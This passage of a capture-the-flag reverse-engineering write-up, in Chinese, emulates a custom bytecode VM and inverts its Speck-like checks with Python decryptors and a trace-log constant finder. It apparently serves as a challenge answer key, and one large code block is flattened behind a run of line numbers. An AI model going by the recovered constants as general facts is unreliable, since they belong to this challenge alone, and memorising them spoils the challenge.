            log(f"CALL FN[{idx}] -> 0x{self.ip:04x}, push RET=0x{ret:04x} at dp=0x{self.dp:04x}")
        elif opcode == 0x83:
            if self.dp == 0xFFFF:
                log("RET with empty stack -> halt")
                self.run_flag = False
                return
            lo = self.read_u8(self.dp)
            hi = self.read_u8(self.dp + 1)
            ret = (hi << 8) | lo
            self.dp = u16(self.dp + 2)
            log(f"RET to 0x{ret:04x}, new dp=0x{self.dp:04x}")
            self.ip = ret
        elif opcode == 0x84:
            reg = self.fetch_u8()
            self._check_regs(opcode, reg)
            # Pushes the register and records it as the output. Despite the
            # "HALT" in the trace text, execution continues.
            self.dp = u16(self.dp - 8)
            self.write_u64(self.dp, self.regs[reg])
            self.output = self.regs[reg]
            log(f"RETVAL R{reg} = 0x{self.regs[reg]:016x} stored at dp=0x{self.dp:04x}, HALT")
        elif opcode == 0x85:
            reg = self.fetch_u8()
            self._check_regs(opcode, reg)
            val = self.read_u64(self.dp)
            self.regs[reg] = val
            self.dp = u16(self.dp + 8)
            log(f"POPQ R{reg} = [dp] => 0x{val:016x}, new dp=0x{self.dp:04x}")
        elif opcode == 0x90:
            arg = self.fetch_u8()
            # Only traced; the emulator keeps running after this opcode.
            log(f"SYSCALL 0x90 arg=0x{arg:02x} (NOT IMPLEMENTED) -> HALT")
        else:
            log("UNKNOWN opcode -> HALT")
            self.run_flag = False

    def run(self, debug=False):
        """Execute until the machine halts and return the recorded output.

        Returns:
            The last value stored by opcode 0x84, or ``None`` if it never ran.
        """
        while self.run_flag:
            self.step(debug=debug)
        return self.output


def run_vm_with_ints(ints, vmcode_path="full_vmcode", debug=False):
    """Load the bytecode file, run it on ``ints`` and return ``(output, vm)``."""
    with open(vmcode_path, "rb") as f:
        code = f.read()
    vm = VM(code, input_ints=ints, debug_after_n=0)
    out = vm.run(debug=debug)
    return out, vm


if __name__ == "__main__":
    # Inputs with some positions replaced by recovered values. Kept for
    # reference; the run below uses the probe inputs.
    partial_ints = [
        1633771873, 13767982679358783948, 11713643540287541804, 1684300900,
        1701143909, 1717986918, 1734829927, 1751672936,
        14773488025708418042, 1785358954, 1802201963, 1819044972,
        1835887981, 1852730990, 1869573999, 1886417008,
        1903260017, 3919366872831373201, 11451939409513851430, 1953789044,
        17235855896972825888, 1987475062, 2004318071, 2021161080,
        2038004089, 2054847098, 1094795585, 1111638594,
        1128481603, 5295387722887053174, 15356410353063384153,
        12187465423418120720, 1195853639, 1212696648, 1229539657,
        1246382666, 1263225675, 1280068684, 1296911693, 1313754702,
        1330597711, 1347440720, 1364283729, 1381126738, 1397969747,
        1414812756, 1431655765, 1448498774, 11625777768394830813,
        1482184792,
    ]
    # Probe inputs: 0x61616161 ("aaaa"), 0x62626262 ("bbbb"), ... one value
    # per ASCII letter. The VM only loads the first 50.
    ints = (
        1633771873, 1650614882, 1667457891, 1684300900, 1701143909,
        1717986918, 1734829927, 1751672936, 1768515945, 1785358954,
        1802201963, 1819044972, 1835887981, 1852730990, 1869573999,
        1886417008, 1903260017, 1920103026, 1936946035, 1953789044,
        1970632053, 1987475062, 2004318071, 2021161080, 2038004089,
        2054847098, 1094795585, 1111638594, 1128481603, 1145324612,
        1162167621, 1179010630, 1195853639, 1212696648, 1229539657,
        1246382666, 1263225675, 1280068684, 1296911693, 1313754702,
        1330597711, 1347440720, 1364283729, 1381126738, 1397969747,
        1414812756, 1431655765, 1448498774, 1465341783, 1482184792,
        1499027801, 1515870810,
    )
    out, vm = run_vm_with_ints(ints, vmcode_path="full_vmcode", debug=True)
    if out is None:
        print("VM finished without explicit 0x84 output")
    else:
        print(f"VM output: {out} (0x{out:016x})")
上面的代码可以完整地打印所有执行流程。输入 ints 我最开始构造的是 aaaa、bbbb 这类由 ascii_letters 中每个字母重复 4 次得到的数(VM 只会读取前 50 个)。最开始可以把被注释掉的 log 全部放开,并把 debug 参数改为 True,这样就能看到完整流程。
观察到第一组数据读出了0x63636363,也就是第三个数,然后会运行到opcode为0x90的地方,可以发现打印Fail前面正好有一处cmp比较了数值,测试发现第一个数是固定的,第二个是我们输入的数字经过加密得到的
我们可以简化一下代码:实际上只需要看从“读取输入数字”开始到“cmp 比较”为止这一段中间的运算代码,jmp 类的 log 和数据读取类的 log 都可以注释掉,方便分析运算逻辑(具体修改是把 debug 改为 False,并在 opcode 0x18 处增加判断:当 reg==0 时设置 debug_ok,从这里开始打印日志)。这样一轮 check 的日志可以缩减到 2000 行左右,可以把一轮的日志喂给各种 AI,让它们各显神通。
最后抽象整理出了几个函数,在之后的几轮check发现都用到了
def loop_64bit(r0, r6):
    """Combine r0 and r6 with the XOR / AND-carry loop seen in the VM trace.

    Each pass XORs the operands and feeds the shifted AND (the carry) back in
    until no carry is left, i.e. a 64-bit wrap-around addition.
    """
    total, addend = r0, r6
    while True:
        carry = (total & addend) & mask64
        total = (total ^ addend) & mask64
        if carry == 0:
            return total
        addend = (carry << 1) & mask64


def build_r2_schedule():
    """Return the 27 per-round r2 values.

    The r2, r3, r4, r5 updates do not depend on r0 / r1, so the whole
    schedule can be generated on its own. Element k is the r2 used by
    round k.
    """
    r2, r3, r4, r5 = 0x6df9f721, 0x8d85b315, 0x40bc0884, 0x28e3d333
    schedule = []
    for k in range(27):
        schedule.append(r2)
        if k != 0x1a:
            # No update is needed after the last round.
            mixed = func_C_32bit(func_B_32bit(func_A_32bit(r3), r2), k)
            rotated = func_D_32bit(r2)
            r2, r3, r4, r5 = func_E_32bit(mixed, rotated), r4, r5, mixed
    return schedule


def rol32(x, n):
    """Rotate the 32-bit value x left by n bits."""
    high = x << n
    low = x >> (32 - n)
    return (high | low) & mask32


def ror32(x, n):
    """Rotate the 32-bit value x right by n bits."""
    low = x >> n
    high = x << (32 - n)
    return (low | high) & mask32


def inv_upper_round(r0_next, r1_next, r2_k):
    """Invert one upper half-round.

    Takes the round's output pair (r0_next, r1_next) and the r2_k used in
    that round, and returns the round's input pair (r0_prev, r1_prev).
    """
    out0 = r0_next & mask32
    out1 = r1_next & mask32
    # Undo the final XOR with r0, then the 3-bit left rotation of r1.
    r1_prev = ror32((out1 ^ out0) & mask32, 3)
    # Undo the XOR with r2_k, the addition of r1, then the 8-bit rotation.
    summed = (out0 ^ r2_k) & mask32
    r0_prev = rol32((summed - r1_prev) & mask32, 8)
    return r0_prev, r1_prev
其中比较重要的是loop_64bit和build_r2_schedule,都传入了常量,但是发现顺序有所不同
这里列下check2和check3,需要注意在前一个check不过的情况下无法打印下一组的check日志,貌似前后有些依赖,第二轮的cmp值我并没有在vmcode里搜索到
check2的解密如下
"""Decryptor for check2: inverse block rounds, then inverse whitening."""

mask64 = 0xFFFFFFFFFFFFFFFF
mask32 = 0xFFFFFFFF

# Initial (r2, r3, r4, r5) words observed for check2.
SCHEDULE_SEED = (0x6df9f721, 0x8d85b315, 0x40bc0884, 0x28e3d333)
ROUNDS = 27


def rol32(x, n):
    """Rotate the 32-bit value x left by n bits."""
    return ((x << n) | (x >> (32 - n))) & mask32


def ror32(x, n):
    """Rotate the 32-bit value x right by n bits."""
    return ((x >> n) | (x << (32 - n))) & mask32


def func_A_32bit(r_in):
    """Rotate the low 32 bits of r_in right by 8."""
    return ror32(r_in & mask32, 8)


def func_B_32bit(r0, r1):
    """Add r0 and r1 modulo 2**32.

    The VM computes this with an XOR / AND-carry loop; plain modular
    addition gives the same result.
    """
    return (r0 + r1) & mask32


def func_C_32bit(r0, r2):
    """XOR r0 with r2, truncated to 32 bits."""
    return (r0 ^ r2) & mask32


def func_D_32bit(r_in):
    """Rotate the low 32 bits of r_in left by 3."""
    return rol32(r_in & mask32, 3)


def func_E_32bit(r0, r1):
    """XOR r1 with r0, truncated to 32 bits."""
    return (r1 ^ r0) & mask32


def loop_64bit(r0, r6):
    """Add r0 and r6 modulo 2**64 (the VM's carry loop, 64-bit variant)."""
    return (r0 + r6) & mask64


def build_r2_schedule(r=None):
    """Return the 27 per-round r2 values.

    The r2, r3, r4, r5 updates do not depend on r0 / r1, so the schedule can
    be generated on its own. Element k is the r2 used by round k.

    Args:
        r: optional sequence whose first four items are the initial
            (r2, r3, r4, r5); defaults to the check2 constants.
    """
    seed = SCHEDULE_SEED if r is None else r
    r2, r3, r4, r5 = seed[0], seed[1], seed[2], seed[3]
    schedule = []
    for k in range(ROUNDS):
        schedule.append(r2)
        if k == ROUNDS - 1:
            # No update is needed after the last round.
            break
        mixed = func_C_32bit(func_B_32bit(func_A_32bit(r3), r2), k)
        r2, r3, r4, r5 = func_E_32bit(mixed, func_D_32bit(r2)), r4, r5, mixed
    return schedule


def inv_upper_round(r0_next, r1_next, r2_k):
    """Invert one upper half-round.

    Takes the round's output pair (r0_next, r1_next) and the r2_k used in
    that round, and returns the round's input pair (r0_prev, r1_prev).
    """
    c0 = r0_next & mask32
    # r1_next = rol32(r1_prev, 3) ^ r0_next
    r1_prev = ror32((r1_next ^ c0) & mask32, 3)
    # r0_next = (ror32(r0_prev, 8) + r1_prev) ^ r2_k
    a0 = ((c0 ^ r2_k) - r1_prev) & mask32
    return rol32(a0, 8), r1_prev


def decrypt_from_trace(cipher):
    """Recover the 64-bit input whose check2 result is ``cipher``.

    The low 32 bits of ``cipher`` are r0 and the high 32 bits are r1.
    """
    r0 = cipher & mask32
    r1 = (cipher >> 32) & mask32
    for r2_k in reversed(build_r2_schedule()):
        r0, r1 = inv_upper_round(r0, r1, r2_k)

    # Undo the whitening applied before the rounds, last step first.
    x = (((r1 & mask32) << 32) | (r0 & mask32)) ^ 0x99d88c4fa4cc68aa
    for addend in (0x58e8abfc7618f5fd, 0xf8a82a8dbdb78c3f,
                   0x11a8bb1017e16849, 0x7209f8c2f24400f7):
        x = (x - addend) & mask64
    for pad in (0x311e18c91413b58c, 0x4303f92241dd9a9f, 0x95714c91bc8b306f):
        x ^= pad
    return x & mask64


if __name__ == "__main__":
    expected_output = 0x659391a5dc3522b3
    recovered_input = decrypt_from_trace(expected_output)
    print(f"解出 input_val = 0x{recovered_input:016x}")
check3的解密如下
"""Decryptor for check3: inverse block rounds, then inverse whitening."""

mask64 = 0xFFFFFFFFFFFFFFFF
mask32 = 0xFFFFFFFF

# Initial (r2, r3, r4, r5) words observed for check3.
SCHEDULE_SEED = (0x71be74bc, 0x1d1a63b5, 0xaac04cfd, 0x3e36eee3)
ROUNDS = 27


def rol32(x, n):
    """Rotate the 32-bit value x left by n bits."""
    return ((x << n) | (x >> (32 - n))) & mask32


def ror32(x, n):
    """Rotate the 32-bit value x right by n bits."""
    return ((x >> n) | (x << (32 - n))) & mask32


def func_A_32bit(r_in):
    """Return (r_in >> 8) ^ (r_in << 24) in 32 bits (rotate right by 8)."""
    return ((r_in >> 8) & mask32) ^ ((r_in << 24) & mask32)


def func_B_32bit(r0, r1):
    """Add r0 and r1 modulo 2**32.

    The VM computes this with an XOR / AND-carry loop; plain modular
    addition gives the same result.
    """
    return (r0 + r1) & mask32


def func_C_32bit(r0, r2):
    """XOR r0 with r2, truncated to 32 bits."""
    return (r0 ^ r2) & mask32


def func_D_32bit(r_in):
    """Return (r_in << 3) ^ (r_in >> 29) in 32 bits (rotate left by 3)."""
    return ((r_in << 3) & mask32) ^ ((r_in >> 29) & mask32)


def func_E_32bit(r0, r1):
    """XOR r1 with r0, truncated to 32 bits."""
    return (r1 ^ r0) & mask32


def loop_64bit(r0, r6):
    """Add r0 and r6 modulo 2**64 (the VM's carry loop, 64-bit variant)."""
    return (r0 + r6) & mask64


def build_r2_schedule(r=None):
    """Return the r2 constant used by each of the 27 upper half-rounds.

    Only the "lower half" of each round (the r2, r3, r4, r5 update) is run.

    Args:
        r: optional sequence whose first four items are the initial
            (r2, r3, r4, r5); defaults to the check3 constants.
    """
    seed = SCHEDULE_SEED if r is None else r
    r2, r3, r4, r5 = seed[0], seed[1], seed[2], seed[3]
    schedule = []
    for k in range(ROUNDS):
        schedule.append(r2)
        if k == ROUNDS - 1:
            # No update is needed after the last round.
            break
        mixed = func_C_32bit(func_B_32bit(func_A_32bit(r3), r2), k)
        r2, r3, r4, r5 = func_E_32bit(mixed, func_D_32bit(r2)), r4, r5, mixed
    return schedule


def inv_upper_round(r0_next, r1_next, r2_k):
    """Invert one upper half-round.

    Given the round output (r0_next, r1_next) and r2_k, return the round
    input (r0_prev, r1_prev).
    """
    c0 = r0_next & mask32
    # r1_next = rol32(r1_prev, 3) ^ r0_next
    r1_prev = ror32((r1_next ^ c0) & mask32, 3)
    # r0_next = (ror32(r0_prev, 8) + r1_prev) ^ r2_k
    a0 = ((c0 ^ r2_k) - r1_prev) & mask32
    return rol32(a0, 8), r1_prev


def decrypt_from_cipher(cipher):
    """Recover the 64-bit input whose check3 result is ``cipher``.

    The low 32 bits of ``cipher`` are r0 and the high 32 bits are r1.
    """
    r0 = cipher & mask32
    r1 = (cipher >> 32) & mask32
    for r2_k in reversed(build_r2_schedule()):
        r0, r1 = inv_upper_round(r0, r1, r2_k)

    k1 = 0x52591d5fa111b92e
    k2 = 0x9eaac37a5d0b1747
    k3 = 0xb98bdad21178175e
    k4 = 0x94c6e3f48118560b
    c1 = 0xc7e29a0a50ac78e3
    c2 = 0xead13c41399fcfd6
    c3 = 0x15f909ccb556ec05
    c4 = 0xe885b64f981d1baa

    # Undo the whitening applied before the rounds, last step first.
    x = ((r1 & mask32) << 32) | (r0 & mask32)
    x = (x - k4) & mask64
    x ^= c4
    x = (x - k3) & mask64
    x ^= c3
    x = (x - k2) & mask64
    x ^= c2
    x ^= c1
    x = (x - k1) & mask64
    return x


if __name__ == "__main__":
    cipher = 0x5538224d4c7a252a
    pt = decrypt_from_cipher(cipher)
    print(f"解出的明文: 0x{pt:016x}")
可以发现,不止常量 k、c、r 不同,运算顺序也有所不同:具体表现在常量 k、c 的数量,以及 speck 加密(看到 flag 才了解到是这个算法)和各次 xor 之间的先后顺序上,其他部分是一致的。
这就比较麻烦了,需要手动在日志里逐条跟踪这些常量出现的位置以及对应的运算顺序。
在check了7、8轮左右基本找到规律,实现了一个简单的find功能,可以自动找到并排好k、c、r顺序,思路是定位关键指令,看代码和日志就知道我的逻辑了,不再赘述
"""Locate the k / c / r constants of one check in a VM trace log."""

RETVAL_MARK = "RETVAL R7 = 0x00000000000000ff stored at dp=0xffef"
XOR_IMM_MARK = "XOR R0 ^= imm64"
CMP_MARK = "CMP R7 == 0x0000000000000000? R7=0x0000000000000000, ZF=True"
AND_MARK = "AND R7 &= R6:"
LDI_R1_MARK = "LDI R1 = "
LDI_R6_MARK = "LDI R6 = "


def _hex_between(line, prefix, terminator):
    """Parse the hex number that follows ``prefix`` up to ``terminator``."""
    return int(line.split(prefix)[1].split(terminator)[0], 16)


def find_constants(lines):
    """Scan trace lines and return the constants in order of appearance.

    Args:
        lines: list of trace log lines.

    Returns:
        A list of ``[line_index, hex_string, tag]`` entries, where ``tag`` is
        ``"k"``, ``"c"`` or ``"r"``. Each 64-bit ``LDI R1`` immediate is
        split into two 32-bit ``"r"`` entries, low half first.
    """
    result = []
    nok = True  # cleared once the 0xfffffffffffffff0 operand has been seen
    total = len(lines)
    i = 0
    while i < total:
        # The first k is loaded right after the RETVAL marker, which is only
        # looked for within the first ten lines.
        if (i < 10 and RETVAL_MARK in lines[i]
                and i + 1 < total and LDI_R6_MARK in lines[i + 1]):
            i += 1
            result.append([i, hex(_hex_between(lines[i], LDI_R6_MARK, ",")), "k"])
        if XOR_IMM_MARK in lines[i]:
            result.append([i, hex(_hex_between(lines[i], "XOR R0 ^= imm64 ", ":")), "c"])
        if nok and CMP_MARK in lines[i]:
            i += 1
            # Collect everything up to the next "AND R7 &= R6:" line. Stop at
            # the end of the log instead of indexing past it.
            while i < total and AND_MARK not in lines[i]:
                if XOR_IMM_MARK in lines[i]:
                    result.append([i, hex(_hex_between(lines[i], "XOR R0 ^= imm64 ", ":")), "c"])
                if LDI_R1_MARK in lines[i]:
                    r = _hex_between(lines[i], LDI_R1_MARK, ",")
                    result.append([i, hex(r & 0xFFFFFFFF), "r"])
                    result.append([i, hex((r >> 32) & 0xFFFFFFFF), "r"])
                i += 1
            if i >= total:
                break
            # The second AND operand is the next k, unless it is the
            # 0xfffffffffffffff0 marker or the value 1.
            k = _hex_between(lines[i], " & ", " ")
            if k == 0xfffffffffffffff0:
                nok = False
            elif k != 1:
                result.append([i, hex(k), "k"])
        i += 1
    return result


def main(log_path="check8.log"):
    """Read the trace at ``log_path`` and print the constants found."""
    with open(log_path, "r") as f:
        lines = f.readlines()
    print(find_constants(lines))


if __name__ == "__main__":
    main()
这里列出了上面代码的结果
1 [[15 , '0xb70f19bde5399216' , 'k' ], [30 , '0x5074d85b9194e696' , 'c' ], [48 , '0xaa99b77363a30dcc' , 'k' ], [66 , '0x8cb331163a92fc19' , 'c' ], [67 , '0xe433713d' , 'r' ], [67 , '0x36b1cc9f' , 'r' ], [70 , '0x9c84ebd8' , 'r' ], [70 , '0xf97646d6' , 'r' ]]
手动很麻烦,50个数,所以尝试把VM、find、check解密三个代码合并在一起
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 273 274 275 276 277 278 279 280 281 282 283 284 285 286 287 288 289 290 291 292 293 294 295 296 297 298 299 300 301 302 303 304 305 306 307 308 309 310 311 312 313 314 315 316 317 318 319 320 321 322 323 324 325 326 327 328 329 330 331 332 333 334 335 336 337 338 339 340 341 342 343 344 345 346 347 348 349 350 351 352 353 354 355 356 357 358 359 360 361 362 363 364 365 366 367 368 369 370 371 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 444 445 446 447 448 449 450 451 452 453 454 455 456 457 458 459 460 461 462 463 464 465 466 467 468 469 470 471 472 473 474 475 476 477 478 479 480 481 482 483 484 485 486 487 488 489 490 491 492 493 494 495 496 497 498 499 500 501 502 503 504 505 506 507 508 509 510 511 512 513 514 515 516 517 518 519 520 521 522 523 524 525 526 527 
528 529 530 531 532 533 534 535 536 537 538 539 540 541 542 543 544 545 546 547 548 549 550 551 552 553 554 555 556 557 558 559 560 561 562 563 564 565 566 567 568 569 570 571 572 573 574 575 576 577 578 579 580 581 582 583 584 585 586 587 588 589 590 591 592 593 594 595 596 597 598 599 600 601 602 603 604 605 606 607 608 609 610 611 612 613 614 615 616 617 618 619 620 621 622 623 624 625 626 627 628 629 630 631 632 633 634 635 636 637 638 639 640 641 642 643 import structMEM_SIZE = 0x10000 DATA_QWORD_BASE = 7168 DATA_BASE = DATA_QWORD_BASE * 8 def u8 (x ): return x & 0xFF def u16 (x ): return x & 0xFFFF def u32 (x ): return x & 0xFFFFFFFF def u64 (x ): return x & 0xFFFFFFFFFFFFFFFF class VM : def __init__ (self, vmcode: bytes , input_ints=None , debug_after_n=None ): self .mem = bytearray (MEM_SIZE) if len (vmcode) > DATA_BASE: raise ValueError("vmcode too large" ) self .mem[:len (vmcode)] = vmcode self .regs = [0 ] * 8 self .ip = 0 self .dp = 0xFFFF self .base0 = 0 self .base1 = 0 self .base2 = 0 self .zf = False self .run_flag = True self .output = None self .debug_ok = False self .num = 0 self .debug_after_n = debug_after_n if input_ints is not None : for idx, val in enumerate (input_ints): if idx >= 50 : break off = DATA_BASE + idx * 8 struct.pack_into("<Q" , self .mem, off, u64(val)) self .log_file = open ("vm.log" , "w" , encoding="utf-8" ) def read_u8 (self, addr ): addr &= 0xFFFF return self .mem[addr] def read_u16 (self, addr ): addr &= 0xFFFF if addr == 0xFFFF : return self .mem[addr] return self .mem[addr] | (self .mem[(addr + 1 ) & 0xFFFF ] << 8 ) def write_u8 (self, addr, val ): addr &= 0xFFFF self .mem[addr] = u8(val) def read_u64 (self, addr ): addr &= 0xFFFF bs = bytes (self .mem[addr:addr+8 ] + self .mem[:max (0 , addr+8 -MEM_SIZE)]) return struct.unpack_from("<Q" , bs, 0 )[0 ] def write_u64 (self, addr, val ): addr &= 0xFFFF b = struct.pack("<Q" , u64(val)) for i in range (8 ): self .mem[(addr + i) & 0xFFFF ] = b[i] def fetch_u8 (self ): b = self 
.read_u8(self .ip) self .ip = u16(self .ip + 1 ) return b def fetch_u16 (self ): lo = self .read_u8(self .ip) hi = self .read_u8(self .ip + 1 ) self .ip = u16(self .ip + 2 ) return (hi << 8 ) | lo def step (self, debug=False ): ip0 = self .ip opcode = self .fetch_u8() def log (msg ): cond = (debug or self .debug_ok) if self .debug_after_n is not None : cond = cond and (self .num == self .debug_after_n-1 ) if cond: line = f"[IP={ip0:04x} OP={opcode:02x} ] {msg} \n" if hasattr (self , "log_file" ) and self .log_file is not None : self .log_file.write(line) self .log_file.flush() else : print (line, end="" ) if opcode == 0x00 : log("NOP" ) return 1 elif opcode == 0x01 : imm = self .fetch_u16() self .ip = imm elif opcode == 0x02 : imm = self .fetch_u16() if not self .zf: self .ip = imm elif opcode == 0x03 : imm = self .fetch_u16() if self .zf: self .ip = imm elif opcode == 0x11 : imm = self .fetch_u16() self .base0 = imm elif opcode == 0x12 : imm = self .fetch_u16() self .base1 = imm elif opcode == 0x15 : reg = self .fetch_u8() if reg >= 8 : return 0 val = self .read_u64(self .base0) self .regs[reg] = val elif opcode == 0x16 : reg = self .fetch_u8() if reg >= 8 : return 0 b = bytes (self .mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) self .regs[reg] = imm self .zf = (imm == 0 ) log(f"LDI R{reg} = 0x{imm:016x} , ZF={self.zf} " ) elif opcode == 0x17 : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 self .regs[dst] = self .regs[src] self .zf = (self .regs[dst] == 0 ) elif opcode == 0x18 : reg = self .fetch_u8() off = self .fetch_u16() if reg >= 8 : return 0 addr = u16(self .base0 + off) val = self .read_u64(addr) self .regs[reg] = val if reg == 0 : self .debug_ok = True log(f"LDQ R{reg} = [base0 + 0x{off:04x} ] @0x{addr:04x} => 0x{val:016x} " ) elif opcode == 0x19 : reg = self .fetch_u8() if reg >= 8 : return 0 self .write_u64(self .base0, 
self .regs[reg]) elif opcode == 0x1A : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 idx = u16(self .regs[src]) addr = u16(self .base0 + idx) val = self .read_u8(addr) self .regs[dst] = val elif opcode == 0x1B : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 idx = u16(self .regs[src]) addr = u16(self .base0 + idx) val = u8(self .regs[dst]) self .write_u8(addr, val) elif opcode == 0x1C : reg = self .fetch_u8() if reg >= 8 : return 0 old = self .regs[reg] self .regs[reg] = u64(old + 1 ) self .zf = (old == 0xFFFFFFFFFFFFFFFF ) elif opcode == 0x1D : reg = self .fetch_u8() if reg >= 8 : return 0 old = self .regs[reg] self .regs[reg] = u64(old - 1 ) self .zf = (old == 1 ) elif opcode == 0x1E : reg = self .fetch_u8() shift = self .fetch_u8() if reg >= 8 : return 0 val = self .regs[reg] res = u64(val >> (shift & 0x3F )) self .regs[reg] = res self .zf = (res == 0 ) elif opcode == 0x1F : reg = self .fetch_u8() if reg >= 8 : return 0 old = self .base0 self .base0 = u16(self .base0 + u16(self .regs[reg])) elif opcode == 0x25 : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 old = self .regs[dst] self .regs[dst] = u64(old & self .regs[src]) self .zf = (self .regs[dst] == 0 ) log(f"AND R{dst} &= R{src} : 0x{old:016x} & 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x} , ZF={self.zf} " ) elif opcode == 0x26 : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 old = self .regs[dst] self .regs[dst] = u64(old ^ self .regs[src]) self .zf = (self .regs[dst] == old) log(f"XOR R{dst} ^= R{src} : 0x{old:016x} ^ 0x{self.regs[src]:016x} = 0x{self.regs[dst]:016x} , ZF={self.zf} " ) elif opcode == 0x27 : reg = self .fetch_u8() shift = self .fetch_u8() if reg >= 8 : return 0 val = self .regs[reg] res = u64(val << (shift & 0x3F )) self .regs[reg] = res self .zf = (res == 0 ) elif opcode == 0x29 : reg = self .fetch_u8() if reg >= 8 : return 0 b = bytes (self 
.mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) old = self .regs[reg] self .regs[reg] = u64(old ^ imm) self .zf = (old == imm) log(f"XOR R{reg} ^= imm64 0x{imm:016x} : 0x{old:016x} -> 0x{self.regs[reg]:016x} , ZF={self.zf} " ) elif opcode == 0x2A : reg = self .fetch_u8() if reg >= 8 : return 0 b = bytes (self .mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) old = self .regs[reg] self .regs[reg] = u64(old & imm) self .zf = (self .regs[reg] == 0 ) elif opcode == 0x2B : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 idx = u16(self .regs[src]) addr = u16(self .base1 + idx) val = self .read_u8(addr) self .regs[dst] = val elif opcode == 0x2C : dst = self .fetch_u8() src = self .fetch_u8() if dst >= 8 or src >= 8 : return 0 idx = u16(self .regs[src]) addr = u16(self .base1 + idx) val = u8(self .regs[dst]) self .write_u8(addr, val) elif opcode == 0x32 : reg = self .fetch_u8() if reg >= 8 : return 0 b = bytes (self .mem[self .ip:self .ip+8 ] + self .mem[:max (0 , self .ip+8 -MEM_SIZE)]) imm = struct.unpack_from("<Q" , b, 0 )[0 ] self .ip = u16(self .ip + 8 ) self .zf = (self .regs[reg] == imm) log(f"CMP R{reg} == 0x{imm:016x} ? 
R{reg} =0x{self.regs[reg]:016x} , ZF={self.zf} " ) if reg == 0 : self .zf = True self .debug_ok = False self .num += 1 if self .num == self .debug_after_n: return 1 elif opcode == 0x80 : self .base2 = self .ip elif opcode == 0x81 : idx = self .fetch_u8() if not hasattr (self , "fun_table" ): self .fun_table = {} self .fun_table[idx] = u16(self .base2 + 3 ) elif opcode == 0x82 : idx = self .fetch_u8() if not hasattr (self , "fun_table" ) or idx not in self .fun_table: return 0 ret = self .ip self .dp = u16(self .dp - 2 ) self .write_u8(self .dp, ret & 0xFF ) self .write_u8(self .dp + 1 , (ret >> 8 ) & 0xFF ) self .ip = self .fun_table[idx] elif opcode == 0x83 : if self .dp == 0xFFFF : self .run_flag = False return 1 lo = self .read_u8(self .dp) hi = self .read_u8(self .dp + 1 ) ret = (hi << 8 ) | lo self .dp = u16(self .dp + 2 ) self .ip = ret elif opcode == 0x84 : reg = self .fetch_u8() if reg >= 8 : return 0 self .dp = u16(self .dp - 8 ) self .write_u64(self .dp, self .regs[reg]) self .output = self .regs[reg] log(f"RETVAL R{reg} = 0x{self.regs[reg]:016x} stored at dp=0x{self.dp:04x} , HALT" ) elif opcode == 0x85 : reg = self .fetch_u8() if reg >= 8 : return 0 val = self .read_u64(self .dp) self .regs[reg] = val self .dp = u16(self .dp + 8 ) elif opcode == 0x90 : arg = self .fetch_u8() log(f"SYSCALL 0x90 arg=0x{arg:02x} (NOT IMPLEMENTED) -> HALT" ) else : log(f"UNKNOWN opcode -> HALT" ) def run (self, debug=False ): steps = 0 try : while self .run_flag: a = self .step(debug=debug) if a == 0 : self .log_file.close() break steps += 1 return self .output finally : if hasattr (self , "log_file" ) and self .log_file is not None : self .log_file.close() self .log_file = None def run_vm_with_ints (ints, vmcode_path="full_vmcode" , debug=False , debug_after_n=9 ): with open (vmcode_path, "rb" ) as f: code = f.read() vm = VM(code, input_ints=ints, debug_after_n=debug_after_n) out = vm.run(debug=debug) return out, vm mask64 = 0xFFFFFFFFFFFFFFFF mask32 = 0xFFFFFFFF def 
# Width masks used by the helpers below; re-declared here (same values) so
# the solver section is self-contained.
mask64 = 0xFFFFFFFFFFFFFFFF
mask32 = 0xFFFFFFFF


def loop_64bit(r0, r6):
    """Return (r0 + r6) mod 2**64, computed with an XOR/AND carry loop.

    Each pass XORs the operands (sum without carry) and feeds the shifted
    AND (the carries) back in until no carry is left.
    """
    while True:
        carry = (r0 & r6) & mask64
        r0 = (r0 ^ r6) & mask64
        if carry == 0:
            break
        r6 = (carry << 1) & mask64
    return r0


def func_A_32bit(r_in):
    """Combine ``r_in >> 8`` and ``r_in << 24`` (each masked to 32 bits) by XOR.

    For a 32-bit input this is a rotate-right by 8.
    """
    low = (r_in >> 8) & mask32
    high = (r_in << 24) & mask32
